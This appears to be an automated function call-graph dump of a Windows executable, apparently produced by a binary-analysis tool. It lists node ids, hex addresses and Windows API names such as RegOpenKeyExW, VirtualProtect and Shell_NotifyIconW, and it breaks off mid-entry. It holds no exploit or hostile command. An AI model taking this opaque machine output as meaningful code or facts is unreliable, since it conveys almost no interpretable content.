101828->101882 101835 82d810 101907 7b7d2c 101835->101907 101837 82d81c Mailbox 101838 82d858 Mailbox 101837->101838 101911 82cfdf 61 API calls 2 library calls 101837->101911 101838->101816 101840 82c989 101839->101840 101844 82c9de 101839->101844 101841 7d0db6 Mailbox 59 API calls 101840->101841 101842 82c9ab 101841->101842 101843 7d0db6 Mailbox 59 API calls 101842->101843 101842->101844 101843->101842 101845 82da50 101844->101845 101846 82dc79 Mailbox 101845->101846 101851 82da73 _strcat _wcscpy __wsetenvp 101845->101851 101846->101804 101847 7b9be6 59 API calls 101847->101851 101848 7b9b3c 59 API calls 101848->101851 101849 7b9b98 59 API calls 101849->101851 101850 7d571c 58 API calls _W_store_winword 101850->101851 101851->101846 101851->101847 101851->101848 101851->101849 101851->101850 101852 7b9837 84 API calls 101851->101852 101918 815887 61 API calls 2 library calls 101851->101918 101852->101851 101855 7d0c1d 101854->101855 101856 7d0cb5 VirtualProtect 101855->101856 101857 7d0c83 101855->101857 101856->101857 101857->101807 101857->101808 101858->101816 101859->101816 101860->101811 101862 7b92d6 101861->101862 101863 7d0db6 Mailbox 59 API calls 101862->101863 101864 7b92e4 101863->101864 101866 7b92f0 101864->101866 101919 7b91fc 59 API calls Mailbox 101864->101919 101867 7b9050 101866->101867 101920 7b9160 101867->101920 101869 7d0db6 Mailbox 59 API calls 101871 7b90fb 101869->101871 101870 7b905f 101870->101869 101870->101871 101871->101824 101872 7b8d40 59 API calls Mailbox 101871->101872 101872->101819 101873->101824 101874->101824 101875->101824 101876->101796 101877->101824 101879 7b7e62 101878->101879 101881 7b7e5f _memmove 101878->101881 101880 7d0db6 Mailbox 59 API calls 101879->101880 101880->101881 101881->101828 101883 80f192 __wsetenvp 101882->101883 101884 80f1d1 101883->101884 101886 80f1c7 101883->101886 101888 80f278 101883->101888 101884->101837 101889 7b7667 101884->101889 101886->101884 101912 7b78c4 61 API calls 101886->101912 101888->101884 101913 7b78c4 61 API calls 101888->101913 101890 7d0db6 Mailbox 59 API calls 101889->101890 101891 7b7688 101890->101891 101892 7d0db6 Mailbox 59 API calls 101891->101892 101893 7b7696 101892->101893 101894 7b784b 101893->101894 101895 7b785a 101894->101895 101896 7b78b7 101894->101896 101895->101896 101898 7b7865 101895->101898 101897 7b7d2c 59 API calls 101896->101897 101899 7b7888 _memmove 101897->101899 101900 7eeb09 101898->101900 101901 7b7880 101898->101901 101899->101835 101915 7b8029 101900->101915 101914 7b7f27 59 API calls Mailbox 101901->101914 101904 7eeb13 101905 7d0db6 Mailbox 59 API calls 101904->101905 101906 7eeb33 101905->101906 101908 7b7d3a 101907->101908 101910 7b7d43 _memmove 101907->101910 101909 7b7e4f 59 API calls 101908->101909 101908->101910 101909->101910 101910->101837 101911->101838 101912->101886 101913->101888 101914->101899 101916 7d0db6 Mailbox 59 API calls 101915->101916 101917 7b8033 101916->101917 101917->101904 101918->101851 101919->101866 101921 7b9169 Mailbox 101920->101921 101922 7ef19f 101921->101922 101926 7b9173 101921->101926 101923 7d0db6 Mailbox 59 API calls 101922->101923 101925 7ef1ab 101923->101925 101924 7b917a 101924->101870 101926->101924 101928 7b9c90 59 API calls Mailbox 101926->101928 101928->101926 101929->101764 101930->101764 101931->101759 101932->101765 101933->101770 101934->101765 101935 7b107d 101940 7b708b 101935->101940 101937 7b108c 101971 7d2d40 101937->101971 101941 7b709b __ftell_nolock 101940->101941 101942 7b7667 59 API calls 101941->101942 101943 7b7151 101942->101943 101974 7b4706 101943->101974 101945 7b715a 101981 7d050b 101945->101981 101952 7b7667 59 API calls 101953 7b718b 101952->101953 102000 7b7d8c 101953->102000 101955 7b7194 RegOpenKeyExW 101956 7ee8b1 RegQueryValueExW 101955->101956 101960 7b71b6 Mailbox 101955->101960 101957 7ee8ce 101956->101957 101958 7ee943 RegCloseKey 101956->101958 101959 7d0db6 Mailbox 59 API calls 101957->101959 101958->101960 101970 7ee955 _wcscat Mailbox __wsetenvp 101958->101970 101961 7ee8e7 101959->101961 101960->101937 102004 7b522e 101961->102004 101964 7ee90f 102007 7b7bcc 101964->102007 101966 7b79f2 59 API calls 101966->101970 101967 7ee929 101967->101958 101968 7b7de1 59 API calls 101968->101970 101969 7b3f74 59 API calls 101969->101970 101970->101960 101970->101966 101970->101968 101970->101969 102038 7d2c44 101971->102038 101973 7b1096 102016 7e1940 101974->102016 101977 7b7de1 59 API calls 101978 7b4739 101977->101978 102018 7b4750 101978->102018 101980 7b4743 Mailbox 101980->101945 101982 7e1940 __ftell_nolock 101981->101982 101983 7d0518 GetFullPathNameW 101982->101983 101984 7d053a 101983->101984 101985 7b7bcc 59 API calls 101984->101985 101986 7b7165 101985->101986 101987 7b7cab 101986->101987 101988 7eed4a 101987->101988 101989 7b7cbf 101987->101989 101991 7b8029 59 API calls 101988->101991 102032 7b7c50 101989->102032 101993 7eed55 __wsetenvp _memmove 101991->101993 101992 7b7173 101994 7b3f74 101992->101994 101995 7b3f82 101994->101995 101999 7b3fa4 _memmove 101994->101999 101997 7d0db6 Mailbox 59 API calls 101995->101997 101996 7d0db6 Mailbox 59 API calls 101998 7b3fb8 101996->101998 101997->101999 101998->101952 101999->101996 102001 7b7d99 102000->102001 102002 7b7da6 102000->102002 102001->101955 102003 7d0db6 Mailbox 59 API calls 102002->102003 102003->102001 102005 7d0db6 Mailbox 59 API calls 102004->102005 102006 7b5240 RegQueryValueExW 102005->102006 102006->101964 102006->101967 102008 7b7bd8 __wsetenvp 102007->102008 102009 7b7c45 102007->102009 102011 7b7bee 102008->102011 102012 7b7c13 102008->102012 102010 7b7d2c 59 API calls 102009->102010 102015 7b7bf6 _memmove 102010->102015 102037 7b7f27 59 API calls Mailbox 102011->102037 102014 7b8029 59 API calls 102012->102014 102014->102015 102015->101967 102017 7b4713 GetModuleFileNameW 102016->102017 102017->101977 102019 7e1940 __ftell_nolock 102018->102019 102020 7b475d GetFullPathNameW 102019->102020 102021 7b4799 102020->102021 102022 7b477c 102020->102022 102024 7b7d8c 59 API calls 102021->102024 102023 7b7bcc 59 API calls 102022->102023 102025 7b4788 102023->102025 102024->102025 102028 7b7726 102025->102028 102029 7b7734 102028->102029 102030 7b7d2c 59 API calls 102029->102030 102031 7b4794 102030->102031 102031->101980 102033 7b7c5f __wsetenvp 102032->102033 102034 7b8029 59 API calls 102033->102034 102035 7b7c70 _memmove 102033->102035 102036 7eed07 _memmove 102034->102036 102035->101992 102037->102015 102039 7d2c50 _fprintf 102038->102039 102046 7d3217 102039->102046 102045 7d2c77 _fprintf 102045->101973 102063 7d9c0b 102046->102063 102048 7d2c59 102049 7d2c88 DecodePointer DecodePointer 102048->102049 102050 7d2cb5 102049->102050 102051 7d2c65 102049->102051 102050->102051 102115 7d87a4 59 API calls 2 library calls 102050->102115 102060 7d2c82 102051->102060 102053 7d2d18 EncodePointer EncodePointer 102053->102051 102054 7d2cc7 102054->102053 102056 7d2cec 102054->102056 102116 7d8864 61 API calls 2 library calls 102054->102116 102056->102051 102058 7d2d06 EncodePointer 102056->102058 102117 7d8864 61 API calls 2 library calls 102056->102117 102058->102053 102059 7d2d00 102059->102051 102059->102058 102118 7d3220 102060->102118 102064 7d9c1c 102063->102064 102065 7d9c2f EnterCriticalSection 102063->102065 102070 7d9c93 102064->102070 102065->102048 102067 7d9c22 102067->102065 102094 7d30b5 58 API calls 3 library calls 102067->102094 102071 7d9c9f _fprintf 102070->102071 102072 7d9ca8 102071->102072 102073 7d9cc0 102071->102073 102095 7da16b 58 API calls 2 library calls 102072->102095 102082 7d9ce1 _fprintf 102073->102082 102098 7d881d 102073->102098 102075 7d9cad 102096 7da1c8 58 API calls 8 library calls 102075->102096 102079 7d9cb4 102097 7d309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 102079->102097 102080 7d9cdc 102104 7d8b28 58 API calls __getptd_noexit 102080->102104 102081 7d9ceb 102085 7d9c0b __lock 58 API calls 102081->102085 102082->102067 102086 7d9cf2 102085->102086 102088 7d9cff 102086->102088 102089 7d9d17 102086->102089 102105 7d9e2b InitializeCriticalSectionAndSpinCount 102088->102105 102106 7d2d55 102089->102106 102092 7d9d0b 102112 7d9d33 LeaveCriticalSection _doexit 102092->102112 102095->102075 102096->102079 102101 7d882b 102098->102101 102099 7d571c _W_store_winword 58 API calls 102099->102101 102100 7d885d 102100->102080 102100->102081 102101->102099 102101->102100 102103 7d883e 102101->102103 102103->102100 102103->102101 102113 7da132 Sleep 102103->102113 102104->102082 102105->102092 102107 7d2d5e RtlFreeHeap 102106->102107 102108 7d2d87 _free 102106->102108 102107->102108 102109 7d2d73 102107->102109 102108->102092 102114 7d8b28 58 API calls __getptd_noexit 102109->102114 102111 7d2d79 GetLastError 102111->102108 102112->102082 102113->102103 102114->102111 102115->102054 102116->102056 102117->102059 102121 7d9d75 LeaveCriticalSection 102118->102121 102120 7d2c87 102120->102045 102121->102120 102122 7b3633 102123 7b366a 102122->102123 102124 7b3688 102123->102124 102125 7b36e7 102123->102125 102161 7b36e5 102123->102161 102126 7b374b PostQuitMessage 102124->102126 102127 7b3695 102124->102127 102129 7ed0cc 102125->102129 102130 7b36ed 102125->102130 102163 7b36d8 102126->102163 102134 7ed154 102127->102134 102135 7b36a0 102127->102135 102128 7b36ca DefWindowProcW 102128->102163 102177 7c1070 10 API calls Mailbox 102129->102177 102131 7b36f2 102130->102131 102132 7b3715 SetTimer RegisterWindowMessageW 102130->102132 102136 7ed06f 102131->102136 102137 7b36f9 KillTimer 102131->102137 102139 7b373e CreatePopupMenu 102132->102139 102132->102163 102193 812527 71 API calls _memset 102134->102193 102140 7b36a8 102135->102140 102141 7b3755 102135->102141 102149 7ed0a8 MoveWindow 102136->102149 102150 7ed074 102136->102150 102174 7b443a Shell_NotifyIconW _memset 102137->102174 102138 7ed0f3 102178 7c1093 331 API calls Mailbox 102138->102178 102139->102163 102145 7ed139 102140->102145 102146 7b36b3 102140->102146 102167 7b44a0 102141->102167 102145->102128 102192 807c36 59 API calls Mailbox 102145->102192 102152 7ed124 102146->102152 102162 7b36be 102146->102162 102147 7ed166 102147->102128 102147->102163 102149->102163 102153 7ed078 102150->102153 102154 7ed097 SetFocus 102150->102154 102151 7b370c 102175 7b3114 DeleteObject DestroyWindow Mailbox 102151->102175 102191 812d36 81 API calls _memset 102152->102191 102158 7ed081 102153->102158 102153->102162 102154->102163 102176 7c1070 10 API calls Mailbox 102158->102176 102160 7ed134 102160->102163 102161->102128 102162->102128 102179 7b443a Shell_NotifyIconW _memset 102162->102179 102165 7ed118 102180 7b434a 102165->102180 102168 7b4539 102167->102168 102169 7b44b7 _memset 102167->102169 102168->102163 102194 7b407c 102169->102194 102171 7b4522 KillTimer SetTimer 102171->102168 102172 7b44de 102172->102171 102173 7ed4ab Shell_NotifyIconW 102172->102173 102173->102171 102174->102151 102175->102163 102176->102163 102177->102138 102178->102162 102179->102165 102181 7b4375 _memset 102180->102181 102221 7b4182 102181->102221 102184 7b43fa 102186 7b4430 Shell_NotifyIconW 102184->102186 102187 7b4414 Shell_NotifyIconW 102184->102187 102188 7b4422 102186->102188 102187->102188 102189 7b407c 61 API calls 102188->102189 102190 7b4429 102189->102190 102190->102161 102191->102160 102192->102161 102193->102147 102195 7b4098 102194->102195 102196 7b416f Mailbox 102194->102196 102216 7b7a16 102195->102216 102196->102172 102199 7ed3c8 LoadStringW 102203 7ed3e2 102199->102203 102200 7b40b3 102201 7b7bcc 59 API calls 102200->102201 102202 7b40c8 102201->102202 102202->102203 102204 7b40d9 102202->102204 102205 7b7b2e 59 API calls 102203->102205 102206 7b40e3 102204->102206 102207 7b4174 102204->102207 102210 7ed3ec 102205->102210 102209 7b7b2e 59 API calls 102206->102209 102208 7b8047 59 API calls 102207->102208 102213 7b40ed _memset _wcscpy 102208->102213 102209->102213 102211 7b7cab 59 API calls 102210->102211 102210->102213 102212 7ed40e 102211->102212 102215 7b7cab 59 API calls 102212->102215 102214 7b4155 Shell_NotifyIconW 102213->102214 102214->102196 102215->102213 102217 7d0db6 Mailbox 59 API calls 102216->102217 102218 7b7a3b 102217->102218 102219 7b8029 59 API calls 102218->102219 102220 7b40a6 102219->102220 102220->102199 102220->102200 102222 7ed423 102221->102222 102223 7b4196 102221->102223 102222->102223 102224 7ed42c DestroyIcon 102222->102224 102223->102184 102225 812f94 62 API calls _W_store_winword 102223->102225 102224->102223 102225->102184 102226 7efe27 102239 7cf944 102226->102239 102228 7efe3d 102229 7efebe 102228->102229 102230 7efe53 102228->102230 102248 7bfce0 102229->102248 102328 7b9e5d 60 API calls 102230->102328 102232 7efe92 102233 7f089c 102232->102233 102234 7efe9a 102232->102234 102330 819e4a 89 API calls 4 library calls 102233->102330 102329 81834f 59 API calls Mailbox 102234->102329 102237 7efeb2 Mailbox 102240 7cf950 102239->102240 102241 7cf962 102239->102241 102331 7b9d3c 60 API calls Mailbox 102240->102331 102243 7cf968 102241->102243 102244 7cf991 102241->102244 102245 7d0db6 Mailbox 59 API calls 102243->102245 102332 7b9d3c 60 API calls Mailbox 102244->102332 102247 7cf95a 102245->102247 102247->102228 102333 7b8180 102248->102333 102250 7bfd3d 102251 7f472d 102250->102251 102313 7c06f6 102250->102313 102338 7bf234 102250->102338 102432 819e4a 89 API calls 4 library calls 102251->102432 102255 7bfe3e 102256 7f488d 102255->102256 102261 7bfe4c 102255->102261 102436 8066ec 59 API calls 2 library calls 102255->102436 102256->102261 102312 7f4742 102256->102312 102438 82a2d9 85 API calls Mailbox 102256->102438 102257 7c0517 102266 7d0db6 Mailbox 59 API calls 102257->102266 102258 7f4b53 102258->102312 102453 819e4a 89 API calls 4 library calls 102258->102453 102260 7f47d7 102260->102312 102434 819e4a 89 API calls 4 library calls 102260->102434 102261->102258 102267 7f48f9 102261->102267 102342 7b837c 102261->102342 102263 7f4848 102437 8060ef 59 API calls 2 library calls 102263->102437 102274 7c0545 _memmove 102266->102274 102275 7f4917 102267->102275 102440 7b85c0 59 API calls Mailbox 102267->102440 102270 7f4755 102270->102260 102433 7bf6a3 331 API calls 102270->102433 102272 7f48b2 Mailbox 102272->102261 102439 8066ec 59 API calls 2 library calls 102272->102439 102282 7d0db6 Mailbox 59 API calls 102274->102282 102279 7f4928 102275->102279 102441 7b85c0 59 API calls Mailbox 102275->102441 102276 7bfea4 102285 7f4ad6 102276->102285 102286 7bff32 102276->102286 102305 7c0179 Mailbox _memmove 102276->102305 102277 7f486b 102280 7b9ea0 331 API calls 102277->102280 102279->102305 102442 8060ab 59 API calls Mailbox 102279->102442 102280->102256 102281 7d0db6 59 API calls Mailbox 102289 7bfdd3 102281->102289 102306 7c0106 _memmove 102282->102306 102451 819ae7 60 API calls 102285->102451 102287 7d0db6 Mailbox 59 API calls 102286->102287 102292 7bff39 102287->102292 102289->102255 102289->102257 102289->102270 102289->102274 102289->102281 102291 7b9ea0 331 API calls 102289->102291 102301 7f480c 102289->102301 102289->102312 102291->102289 102292->102313 102349 7c09d0 102292->102349 102293 7bffe6 102307 7c0007 102293->102307 102311 7b8047 59 API calls 102293->102311 102294 7b9ea0 331 API calls 102295 7f4a87 102294->102295 102295->102312 102446 7b84c0 102295->102446 102297 7bffb2 102297->102274 102297->102293 102297->102313 102435 819e4a 89 API calls 4 library calls 102301->102435 102304 7f4ab2 102450 819e4a 89 API calls 4 library calls 102304->102450 102305->102304 102305->102313 102314 7d0db6 59 API calls Mailbox 102305->102314 102315 7c0398 102305->102315 102321 7f4a1c 102305->102321 102325 7f4a4d 102305->102325 102428 7b8740 68 API calls __cinit 102305->102428 102429 7b8660 68 API calls 102305->102429 102443 815937 68 API calls 102305->102443 102444 7b89b3 69 API calls Mailbox 102305->102444 102445 7b9d3c 60 API calls Mailbox 102305->102445 102306->102305 102327 7c0162 102306->102327 102430 7b9c90 59 API calls Mailbox 102306->102430 102307->102313 102316 7f4b24 102307->102316 102318 7c004c 102307->102318 102311->102307 102431 819e4a 89 API calls 4 library calls 102313->102431 102314->102305 102315->102237 102452 7b9d3c 60 API calls Mailbox 102316->102452 102318->102258 102318->102313 102319 7c00d8 102318->102319 102426 7b9d3c 60 API calls Mailbox 102319->102426 102324 7d0db6 Mailbox 59 API calls 102321->102324 102322 7c00eb 102322->102313 102427 7b82df 59 API calls Mailbox 102322->102427 102324->102325 102325->102294 102327->102237 102328->102232 102329->102237 102330->102237 102331->102247 102332->102247 102334 7b818f 102333->102334 102337 7b81aa 102333->102337 102335 7b7e4f 59 API calls 102334->102335 102336 7b8197 CharUpperBuffW 102335->102336 102336->102337 102337->102250 102339 7bf251 102338->102339 102340 7bf272 102339->102340 102454 819e4a 89 API calls 4 library calls 102339->102454 102340->102289 102343 7eedbd 102342->102343 102344 7b838d 102342->102344 102345 7d0db6 Mailbox 59 API calls 102344->102345 102346 7b8394 102345->102346 102347 7b83b5 102346->102347 102455 7b8634 59 API calls Mailbox 102346->102455 102347->102267 102347->102276 102350 7f4cc3 102349->102350 102362 7c09f5 102349->102362 102515 819e4a 89 API calls 4 library calls 102350->102515 102352 7c0ce4 102353 7c0cfa 102352->102353 102512 7c1070 10 API calls Mailbox 102352->102512 102353->102297 102355 7c0ee4 102355->102353 102357 7c0ef1 102355->102357 102513 7c1093 331 API calls Mailbox 102357->102513 102358 7c0a4b PeekMessageW 102424 7c0a05 Mailbox 102358->102424 102360 7c0ef8 LockWindowUpdate DestroyWindow GetMessageW 102360->102353 102364 7c0f2a 102360->102364 102362->102424 102516 7b9e5d 60 API calls 102362->102516 102517 806349 331 API calls 102362->102517 102363 7f4e81 Sleep 102363->102424 102366 7f5c58 TranslateMessage DispatchMessageW GetMessageW 102364->102366 102366->102366 102367 7f5c88 102366->102367 102367->102353 102368 7c0ea5 TranslateMessage DispatchMessageW 102369 7c0e43 PeekMessageW 102368->102369 102369->102424 102370 7f4d50 TranslateAcceleratorW 102370->102369 102370->102424 102372 7c0d13 timeGetTime 102372->102424 102373 7f581f WaitForSingleObject 102375 7f583c GetExitCodeProcess CloseHandle 102373->102375 102373->102424 102374 7b7667 59 API calls 102410 7c0e70 Mailbox 102374->102410 102408 7c0f95 102375->102408 102376 7c0e5f Sleep 102376->102410 102377 7b8047 59 API calls 102377->102424 102379 7d0db6 59 API calls Mailbox 102379->102424 102380 7f5af8 Sleep 102380->102410 102382 7d049f timeGetTime 102382->102410 102383 7c0f4e timeGetTime 102514 7b9e5d 60 API calls 102383->102514 102386 7f5b8f GetExitCodeProcess 102388 7f5bbb CloseHandle 102386->102388 102389 7f5ba5 WaitForSingleObject 102386->102389 102387 7b9837 84 API calls 102387->102424 102388->102410 102389->102388 102389->102424 102392 835f25 110 API calls 102392->102410 102393 7bb7dd 109 API calls 102393->102410 102394 7f5874 102394->102408 102395 7f5c17 Sleep 102395->102424 102396 7f5078 Sleep 102396->102424 102398 7b7de1 59 API calls 102398->102410 102401 7b9e5d 60 API calls 102401->102424 102403 7b9ea0 304 API calls 102403->102424 102406 7bfce0 304 API calls 102406->102424 102408->102297 102410->102374 102410->102382 102410->102386 102410->102392 102410->102393 102410->102394 102410->102395 102410->102396 102410->102398 102410->102408 102410->102424 102524 812408 60 API calls 102410->102524 102525 7b9e5d 60 API calls 102410->102525 102526 7b89b3 69 API calls Mailbox 102410->102526 102527 7bb73c 331 API calls 102410->102527 102528 8064da 60 API calls 102410->102528 102529 815244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 102410->102529 102530 813c55 66 API calls Mailbox 102410->102530 102411 819e4a 89 API calls 102411->102424 102413 7b84c0 69 API calls 102413->102424 102414 7b89b3 69 API calls 102414->102424 102415 7b9c90 59 API calls Mailbox 102415->102424 102416 80617e 59 API calls Mailbox 102416->102424 102418 7b7de1 59 API calls 102418->102424 102419 7f55d5 VariantClear 102419->102424 102420 7f566b VariantClear 102420->102424 102421 806e8f 59 API calls 102421->102424 102422 7b8cd4 59 API calls Mailbox 102422->102424 102423 7f5419 VariantClear 102423->102424 102424->102352 102424->102358 102424->102363 102424->102368 102424->102369 102424->102370 102424->102372 102424->102373 102424->102376 102424->102377 102424->102379 102424->102380 102424->102383 102424->102387 102424->102401 102424->102403 102424->102406 102424->102408 102424->102410 102424->102411 102424->102413 102424->102414 102424->102415 102424->102416 102424->102418 102424->102419 102424->102420 102424->102421 102424->102422 102424->102423 102425 7bb73c 304 API calls 102424->102425 102456 7be6a0 102424->102456 102487 7bf460 102424->102487 102506 7b31ce 102424->102506 102511 7be420 331 API calls 102424->102511 102518 836018 59 API calls 102424->102518 102519 819a15 59 API calls Mailbox 102424->102519 102520 80d4f2 59 API calls 102424->102520 102521 8060ef 59 API calls 2 library calls 102424->102521 102522 7b8401 59 API calls 102424->102522 102523 7b82df 59 API calls Mailbox 102424->102523 102425->102424 102426->102322 102427->102306 102428->102305 102429->102305 102430->102306 102431->102251 102432->102312 102433->102260 102434->102312 102435->102312 102436->102263 102437->102277 102438->102272 102439->102272 102440->102275 102441->102279 102442->102305 102443->102305 102444->102305 102445->102305 102447 7b84cb 102446->102447 102449 7b84f2 102447->102449 103443 7b89b3 69 API calls Mailbox 102447->103443 102449->102304 102450->102312 102451->102293 102452->102258 102453->102312 102454->102340 102455->102347 102457 7be6d5 102456->102457 102458 7f3aa9 102457->102458 102461 7be73f 102457->102461 102465 7be799 102457->102465 102459 7b9ea0 331 API calls 102458->102459 102460 7f3abe 102459->102460 102486 7be970 Mailbox 102460->102486 102532 819e4a 89 API calls 4 library calls 102460->102532 102464 7b7667 59 API calls 102461->102464 102461->102465 102462 7b7667 59 API calls 102462->102465 102466 7f3b04 102464->102466 102465->102462 102467 7d2d40 __cinit 67 API calls 102465->102467 102468 7f3b26 102465->102468 102473 7be95a 102465->102473 102465->102486 102469 7d2d40 __cinit 67 API calls 102466->102469 102467->102465 102468->102424 102469->102465 102470 819e4a 89 API calls 102470->102486 102471 7b84c0 69 API calls 102471->102486 102472 7b9ea0 331 API calls 102472->102486 102473->102486 102533 819e4a 89 API calls 4 library calls 102473->102533 102475 7b8d40 59 API calls 102475->102486 102482 7bf195 102537 819e4a 89 API calls 4 library calls 102482->102537 102484 7f3e25 102484->102424 102485 7bea78 102485->102424 102486->102470 102486->102471 102486->102472 102486->102475 102486->102482 102486->102485 102531 7b7f77 59 API calls 2 library calls 102486->102531 102534 806e8f 59 API calls 102486->102534 102535 82c5c3 331 API calls 102486->102535 102536 82b53c 331 API calls Mailbox 102486->102536 102538 7b9c90 59 API calls Mailbox 102486->102538 102539 8293c6 331 API calls Mailbox 102486->102539 102488 7bf4ba 102487->102488 102489 7bf650 102487->102489 102490 7f441e 102488->102490 102491 7bf4c6 102488->102491 102492 7b7de1 59 API calls 102489->102492 102640 82bc6b 331 API calls Mailbox 102490->102640 102638 7bf290 331 API calls 2 library calls 102491->102638 102498 7bf58c Mailbox 102492->102498 102495 7f442c 102499 7bf630 102495->102499 102641 819e4a 89 API calls 4 library calls 102495->102641 102497 7bf4fd 102497->102495 102497->102498 102497->102499 102540 813c37 102498->102540 102543 7b4e4a 102498->102543 102549 81cb7a 102498->102549 102629 82445a 102498->102629 102499->102424 102501 7bf5e3 102501->102499 102639 7b9c90 59 API calls Mailbox 102501->102639 102507 7b3212 102506->102507 102508 7b31e0 102506->102508 102507->102424 102508->102507 102509 7b3205 IsDialogMessageW 102508->102509 102510 7ecf32 GetClassLongW 102508->102510 102509->102507 102509->102508 102510->102508 102510->102509 102511->102424 102512->102355 102513->102360 102514->102424 102515->102362 102516->102362 102517->102362 102518->102424 102519->102424 102520->102424 102521->102424 102522->102424 102523->102424 102524->102410 102525->102410 102526->102410 102527->102410 102528->102410 102529->102410 102530->102410 102531->102486 102532->102486 102533->102486 102534->102486 102535->102486 102536->102486 102537->102484 102538->102486 102539->102486 102642 81445a GetFileAttributesW 102540->102642 102544 7b4e54 102543->102544 102546 7b4e5b 102543->102546 102646 7d53a6 102544->102646 102547 7b4e7b FreeLibrary 102546->102547 102548 7b4e6a 102546->102548 102547->102548 102548->102501 102550 7b7667 59 API calls 102549->102550 102551 81cbaf 102550->102551 102552 7b7667 59 API calls 102551->102552 102553 81cbb8 102552->102553 102554 81cbcc 102553->102554 103103 7b9b3c 59 API calls 102553->103103 102556 7b9837 84 API calls 102554->102556 102557 81cbe9 102556->102557 102558 81cc0b 102557->102558 102559 81ccea 102557->102559 102628 81cd1a Mailbox 102557->102628 102560 7b9837 84 API calls 102558->102560 102916 7b4ddd 102559->102916 102562 81cc17 102560->102562 102564 7b8047 59 API calls 102562->102564 102566 81cc23 102564->102566 102565 81cd16 102568 7b7667 59 API calls 102565->102568 102565->102628 102572 81cc37 102566->102572 102573 81cc69 102566->102573 102567 7b4ddd 136 API calls 102567->102565 102569 81cd4b 102568->102569 102570 7b7667 59 API calls 102569->102570 102571 81cd54 102570->102571 102574 7b7667 59 API calls 102571->102574 102575 7b8047 59 API calls 102572->102575 102576 7b9837 84 API calls 102573->102576 102578 81cd5d 102574->102578 102579 81cc47 102575->102579 102577 81cc76 102576->102577 102580 7b8047 59 API calls 102577->102580 102581 7b7667 59 API calls 102578->102581 102582 7b7cab 59 API calls 102579->102582 102583 81cc82 102580->102583 102584 81cd66 102581->102584 102585 81cc51 102582->102585 103104 814a31 GetFileAttributesW 102583->103104 102587 7b9837 84 API calls 102584->102587 102588 7b9837 84 API calls 102585->102588 102590 81cd73 102587->102590 102591 81cc5d 102588->102591 102589 81cc8b 102592 81cc9e 102589->102592 102595 7b79f2 59 API calls 102589->102595 102940 7b459b 102590->102940 102594 7b7b2e 59 API calls 102591->102594 102597 7b9837 84 API calls 102592->102597 102603 81cca4 102592->102603 102594->102573 102595->102592 102596 81cd8e 102991 7b79f2 102596->102991 102599 81cccb 102597->102599 103105 8137ef 75 API calls Mailbox 102599->103105 102602 81cdd1 102604 7b8047 59 API calls 102602->102604 102603->102628 102606 81cddf 102604->102606 102605 7b79f2 59 API calls 102607 81cdae 102605->102607 102608 7b7b2e 59 API calls 102606->102608 102607->102602 102610 7b7bcc 59 API calls 102607->102610 102609 81cded 102608->102609 102612 7b7b2e 59 API calls 102609->102612 102611 81cdc3 102610->102611 102613 7b7bcc 59 API calls 102611->102613 102614 81cdfb 102612->102614 102613->102602 102615 7b7b2e 59 API calls 102614->102615 102616 81ce09 102615->102616 102617 7b9837 84 API calls 102616->102617 102618 81ce15 102617->102618 102994 814071 102618->102994 102620 81ce26 102621 813c37 3 API calls 102620->102621 102622 81ce30 102621->102622 102623 7b9837 84 API calls 102622->102623 102627 81ce61 102622->102627 102624 81ce4e 102623->102624 103048 819155 102624->103048 102626 7b4e4a 84 API calls 102626->102628 102627->102626 102628->102501 102630 7b9837 84 API calls 102629->102630 102631 824494 102630->102631 103403 7b6240 102631->103403 102633 8244a4 102634 8244c9 102633->102634 102635 7b9ea0 331 API calls 102633->102635 102637 8244cd 102634->102637 103428 7b9a98 59 API calls Mailbox 102634->103428 102635->102634 102637->102501 102638->102497 102639->102501 102640->102495 102641->102499 102643 813c3e 102642->102643 102644 814475 FindFirstFileW 102642->102644 102643->102501 102644->102643 102645 81448a FindClose 102644->102645 102645->102643 102647 7d53b2 _fprintf 102646->102647 102648 7d53de 102647->102648 102649 7d53c6 102647->102649 102658 7d53d6 _fprintf 102648->102658 102659 7d6c11 102648->102659 102681 7d8b28 58 API calls __getptd_noexit 102649->102681 102651 7d53cb 102682 7d8db6 9 API calls _fprintf 102651->102682 102658->102546 102660 7d6c21 102659->102660 102661 7d6c43 EnterCriticalSection 102659->102661 102660->102661 102662 7d6c29 102660->102662 102663 7d53f0 102661->102663 102664 7d9c0b __lock 58 API calls 102662->102664 102665 7d533a 102663->102665 102664->102663 102666 7d535d 102665->102666 102667 7d5349 102665->102667 102673 7d5359 102666->102673 102684 7d4a3d 102666->102684 102727 7d8b28 58 API calls __getptd_noexit 102667->102727 102669 7d534e 102728 7d8db6 9 API calls _fprintf 102669->102728 102683 7d5415 LeaveCriticalSection LeaveCriticalSection _fprintf 102673->102683 102677 7d5377 102701 7e0a02 102677->102701 102679 7d537d 102679->102673 102680 7d2d55 _free 58 API calls 102679->102680 102680->102673 102681->102651 102682->102658 102683->102658 102685 7d4a50 102684->102685 102686 7d4a74 102684->102686 102685->102686 102687 7d46e6 __flsbuf 58 API calls 102685->102687 102690 7e0b77 102686->102690 102688 7d4a6d 102687->102688 102729 7dd886 102688->102729 102691 7d5371 102690->102691 102692 7e0b84 102690->102692 102694 7d46e6 102691->102694 102692->102691 102693 7d2d55 _free 58 API calls 102692->102693 102693->102691 102695 7d4705 102694->102695 102696 7d46f0 102694->102696 102695->102677 102871 7d8b28 58 API calls __getptd_noexit 102696->102871 102698 7d46f5 102872 7d8db6 9 API calls _fprintf 102698->102872 102700 7d4700 102700->102677 102702 7e0a0e _fprintf 102701->102702 102703 7e0a1b 102702->102703 102704 7e0a32 102702->102704 102888 7d8af4 58 API calls __getptd_noexit 102703->102888 102706 7e0abd 102704->102706 102708 7e0a42 102704->102708 102893 7d8af4 58 API calls __getptd_noexit 102706->102893 102707 7e0a20 102889 7d8b28 58 API calls __getptd_noexit 102707->102889 102712 7e0a6a 102708->102712 102713 7e0a60 102708->102713 102710 7e0a65 102894 7d8b28 58 API calls __getptd_noexit 102710->102894 102715 7dd206 ___lock_fhandle 59 API calls 102712->102715 102890 7d8af4 58 API calls __getptd_noexit 102713->102890 102717 7e0a70 102715->102717 102719 7e0a8e 102717->102719 102720 7e0a83 102717->102720 102718 7e0ac9 102895 7d8db6 9 API calls _fprintf 102718->102895 102891 7d8b28 58 API calls __getptd_noexit 102719->102891 102873 7e0add 102720->102873 102723 7e0a27 _fprintf 102723->102679 102725 7e0a89 102892 7e0ab5 LeaveCriticalSection __unlock_fhandle 102725->102892 102727->102669 102728->102673 102730 7dd892 _fprintf 